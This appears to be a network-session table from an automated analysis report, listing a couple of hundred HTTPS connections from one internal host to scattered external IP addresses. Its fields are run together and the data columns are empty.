                                            14745192.168.2.1538542130.137.60.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14746192.168.2.153388243.119.209.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14747192.168.2.1558390131.132.180.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14748192.168.2.1536426176.50.243.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14749192.168.2.154299494.130.200.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14750192.168.2.1557956205.77.36.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14751192.168.2.1549266188.110.124.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14752192.168.2.1550590183.162.201.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14753192.168.2.1558942162.201.224.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14754192.168.2.155817878.212.60.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14755192.168.2.155129873.147.187.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14756192.168.2.155310060.231.92.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14757192.168.2.1560192115.250.235.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14758192.168.2.1560566137.155.19.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14759192.168.2.1559998197.237.160.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14760192.168.2.1553774197.142.40.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14761192.168.2.153802893.201.130.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14762192.168.2.1535902101.128.124.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14763192.168.2.1554382103.13.153.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14764192.168.2.1539754190.108.189.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14765192.168.2.153733491.195.179.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14766192.168.2.155070679.214.110.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14767192.168.2.1549190117.124.106.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14768192.168.2.15574705.119.32.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14769192.168.2.154890624.189.222.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14770192.168.2.1559708113.191.12.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14771192.168.2.1537342112.40.88.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14772192.168.2.1553342180.214.77.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14773192.168.2.1546364114.165.141.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14774192.168.2.153345825.178.248.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14775192.168.2.1554224112.182.215.818080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14776192.168.2.1536038104.24.5.2248080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14777192.168.2.153887868.136.212.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14778192.168.2.155632695.67.162.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14779192.168.2.1541402106.221.127.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14780192.168.2.155654487.41.159.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14781192.168.2.1555010178.209.172.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14782192.168.2.153427645.122.175.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14783192.168.2.1535594172.130.46.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14784192.168.2.153490486.45.136.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14785192.168.2.156030023.109.66.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14786192.168.2.1556118186.238.253.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14787192.168.2.1549346200.124.214.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14788192.168.2.1551518195.199.9.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14789192.168.2.153300840.79.230.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14790192.168.2.153295432.109.8.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14791192.168.2.1554202147.200.53.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14792192.168.2.154824089.70.124.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14793192.168.2.1547306159.191.149.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14794192.168.2.1559074181.54.45.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14795192.168.2.154201437.35.143.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14796192.168.2.1546338112.179.198.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14797192.168.2.1535972194.118.70.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14798192.168.2.15424002.182.32.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14799192.168.2.154692835.123.122.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14800192.168.2.1547826133.237.3.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14801192.168.2.1537898158.171.20.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14802192.168.2.1546050128.85.15.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14803192.168.2.155342083.77.141.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14804192.168.2.1534396174.234.130.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14805192.168.2.1549534203.16.195.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14806192.168.2.154721877.180.77.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14807192.168.2.1542302102.92.154.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14808192.168.2.1543844135.172.176.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14809192.168.2.1534712135.222.171.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14810192.168.2.1550028168.14.67.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14811192.168.2.1560166154.170.134.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14812192.168.2.153900212.230.145.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14813192.168.2.1539836176.212.206.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14814192.168.2.1547038147.184.43.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14815192.168.2.1555798178.22.149.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14816192.168.2.155816843.136.94.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14817192.168.2.1539464181.233.245.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14818192.168.2.1546352119.142.86.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14819192.168.2.1557362213.112.229.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14820192.168.2.153522847.150.30.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14821192.168.2.1537796217.47.121.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14822192.168.2.155974663.211.188.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14823192.168.2.1552500161.124.134.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14824192.168.2.154491079.104.32.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14825192.168.2.1542700150.64.54.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14826192.168.2.155565878.182.171.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14827192.168.2.154698257.118.137.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14828192.168.2.1552534170.233.81.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14829192.168.2.154593469.38.111.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14830192.168.2.1542726112.201.181.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14831192.168.2.155976878.223.54.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14832192.168.2.154718667.114.96.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14833192.168.2.154548417.228.221.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14834192.168.2.1550386222.129.72.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14835192.168.2.1548770216.181.130.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14836192.168.2.1549322194.49.194.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14837192.168.2.1560110151.37.220.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14838192.168.2.1552872106.240.129.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14839192.168.2.1551528107.185.144.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14840192.168.2.153984845.242.212.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14841192.168.2.1542018109.50.27.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14842192.168.2.155334881.117.122.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14843192.168.2.1559276140.198.45.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14844192.168.2.153453219.35.12.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14845192.168.2.1544800114.122.62.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14846192.168.2.153852482.85.254.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14847192.168.2.1534206101.147.55.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14848192.168.2.154660220.26.199.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14849192.168.2.15563428.96.115.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14850192.168.2.1533376181.9.81.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14851192.168.2.1549576187.45.75.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14852192.168.2.1552566138.157.243.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14853192.168.2.1545624198.224.207.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14854192.168.2.1537062125.155.143.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14855192.168.2.1536684119.84.228.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14856192.168.2.15336305.103.53.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14857192.168.2.1541172193.42.66.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14858192.168.2.1549102177.25.89.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14859192.168.2.1543196217.179.148.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14860192.168.2.1560652180.87.120.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14861192.168.2.1533398146.34.138.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14862192.168.2.1543300118.218.43.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14863192.168.2.155262070.151.60.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14864192.168.2.153859862.223.185.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14865192.168.2.1552026109.161.64.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14866192.168.2.1548720171.246.6.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14867192.168.2.1548878151.53.107.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14868192.168.2.1551836180.133.186.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14869192.168.2.1542658153.211.111.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14870192.168.2.153944618.24.38.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14871192.168.2.154880431.192.214.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14872192.168.2.15375601.146.75.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14873192.168.2.1548116123.13.4.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14874192.168.2.1546472154.140.26.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14875192.168.2.154830257.70.97.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14876192.168.2.1534576137.231.227.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14877192.168.2.1558620187.251.187.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14878192.168.2.1533566114.67.130.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14879192.168.2.1552434152.5.131.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14880192.168.2.1543356160.91.30.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14881192.168.2.154641097.31.135.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14882192.168.2.1553094139.238.177.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14883192.168.2.1545848137.193.174.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14884192.168.2.1535596198.65.78.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14885192.168.2.155356225.126.16.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14886192.168.2.153487247.16.140.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14887192.168.2.154569865.70.204.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14888192.168.2.153843252.242.7.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14889192.168.2.155034854.87.53.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14890192.168.2.1550098222.45.139.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14891192.168.2.1536598162.13.139.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14892192.168.2.1546450134.88.195.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14893192.168.2.1534664203.208.249.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14894192.168.2.155330078.118.128.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14895192.168.2.153921661.232.236.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14896192.168.2.154737414.115.43.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14897192.168.2.155599097.42.61.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14898192.168.2.1553230195.62.217.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14899192.168.2.1548522213.166.141.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14900192.168.2.154566442.67.206.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14901192.168.2.1546032134.241.63.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14902192.168.2.1549668134.231.14.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14903192.168.2.1546594199.61.174.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14904192.168.2.15334941.111.38.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14905192.168.2.1552098205.35.122.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14906192.168.2.154231282.37.31.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14907192.168.2.1539986187.130.252.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14908192.168.2.1534002221.243.252.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14909192.168.2.1535654190.184.16.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14910192.168.2.1539340182.186.6.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14911192.168.2.155056420.126.233.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14912192.168.2.153943451.158.161.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14913192.168.2.1533624197.187.11.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14914192.168.2.1536520153.223.90.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14915192.168.2.155850071.207.154.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14916192.168.2.1533862200.187.83.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14917192.168.2.1536338165.176.183.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14918192.168.2.1553076145.51.200.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14919192.168.2.1560406176.248.109.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14920192.168.2.15574368.123.150.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14921192.168.2.1543770117.147.222.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14922192.168.2.1559098151.221.218.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14923192.168.2.15351402.127.240.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14924192.168.2.1559398117.254.11.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14925192.168.2.155147878.187.165.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14926192.168.2.1546208170.136.104.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14927192.168.2.155220688.213.25.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14928192.168.2.1556858116.81.85.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14929192.168.2.1559370169.86.93.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14930192.168.2.155631298.94.106.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14931192.168.2.154617845.55.221.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14932192.168.2.153978827.135.110.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14933192.168.2.1535592156.199.147.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14934192.168.2.154119446.107.146.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14935192.168.2.1540086222.193.1.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14936192.168.2.154221220.152.9.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14937192.168.2.1551760192.116.246.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14938192.168.2.1546982219.214.6.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14939192.168.2.1546246192.229.167.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14940192.168.2.1540078202.29.127.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14941192.168.2.1559100204.163.97.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14942192.168.2.154086834.99.32.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14943192.168.2.155725062.216.85.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14944192.168.2.1541110161.5.20.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14945192.168.2.1536736107.218.204.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14946192.168.2.1559074156.104.58.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14947192.168.2.153495671.45.238.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14948192.168.2.154889462.219.103.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14949192.168.2.1538422162.18.234.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14950192.168.2.1547932171.138.52.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14951192.168.2.1547496207.199.122.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14952192.168.2.154459069.219.67.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14953192.168.2.1554000170.8.168.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14954192.168.2.154188065.192.113.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14955192.168.2.154990881.235.69.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14956192.168.2.155300692.85.86.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14957192.168.2.155349848.204.107.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14958192.168.2.1543880137.50.124.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14959192.168.2.155710665.175.214.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14960192.168.2.155610646.193.65.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14961192.168.2.1558024174.130.43.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14962192.168.2.154326837.96.63.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14963192.168.2.1549318124.130.52.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14964192.168.2.154174671.57.130.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14965192.168.2.153600063.194.18.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14966192.168.2.1532986106.120.134.64443
                                            TimestampBytes transferredDirectionData


